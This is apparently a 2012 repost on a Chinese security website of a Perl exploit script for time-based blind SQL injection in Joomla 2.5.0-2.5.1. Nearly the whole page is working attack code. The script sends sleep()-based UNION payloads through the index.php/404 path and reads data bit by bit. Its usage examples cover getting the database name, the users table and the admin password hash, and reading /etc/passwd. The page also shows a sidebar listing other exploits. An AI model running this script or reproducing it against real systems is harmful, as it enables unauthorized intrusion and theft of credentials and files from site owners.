Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

来源：www.securitybydefault.com 作者：Ramos 发布时间：2012-03-20

#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
  $lenoflen = $_;
  last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
  $len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
  my $c=8;
  @byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
  $stime = time();
  # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
  $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
  $etime = time();
  my $rtt = $etime - $stime;
  if ($rtt >= $regrtt + $wtime) {
   $byte[$c]="0";
  } else { $byte[$c]="1"; }
$c--;
}
   $str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告